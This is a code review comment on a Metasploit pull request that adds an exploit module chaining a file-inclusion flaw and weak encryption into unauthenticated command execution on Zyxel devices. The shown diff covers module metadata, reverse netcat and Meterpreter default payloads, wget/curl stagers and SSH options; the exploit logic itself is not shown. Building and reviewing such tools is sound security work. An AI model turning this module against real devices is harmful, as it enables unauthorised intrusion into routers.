modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb

```diff
@@ -0,0 +1,469 @@
+
+          After exploitation, an attacker will be able to execute any command as user `supervisor`.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author of exploit chain and MSF module contributor
+          'SEC Consult Vulnerability Lab',
+          'Thomas Rinsma',
+          'Bogi Napoleon Wennerstrøm'
+        ],
+        'References' => [
+          ['URL', 'https://r.sec-consult.com/zyxsploit'],
+          ['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/'],
+          ['URL', 'https://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/'],
+          ['URL', 'https://github.com/boginw/zyxel-vmg8825-keygen'],
+          ['URL', 'https://attackerkb.com/topics/dkw2Y2zdyN/zyxel-chained-rce-using-lfi-and-weak-aes-encryption-no-cve']
+        ],
+        'DisclosureDate' => '2022-02-01',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPSBE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPSBE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['printf', 'echo', 'bourne', 'wget', 'curl'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Interactive SSH',
+            {
+              'DefaultOptions' => {
+                'PAYLOAD' => 'generic/ssh/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'ssh_interact'
+                }
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptBool.new('STORE_CRED', [false, 'Store credentials into the database.', true])
+      ]
+    )
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
```

Comment:
These look like they're already included from the `Msf::Exploit::Remote::SSH` mixin which includes https://github.com/rapid7/metasploit-framework/blob/f6c8181b7f3edc3f29f41a323c2f8eb054619cd5/lib/msf/core/exploit/remote/ssh/options.rb#L29-L43.

I do see that you're adjusting the SSH_TIMEOUT, but you can drop that into the default options with RPORT, SSL and WfsDelay.

Reply:
Updated -> see https://github.com/rapid7/metasploit-framework/pull/17881/commits/c39751094ad8d036e45807ad8d361287911a3e63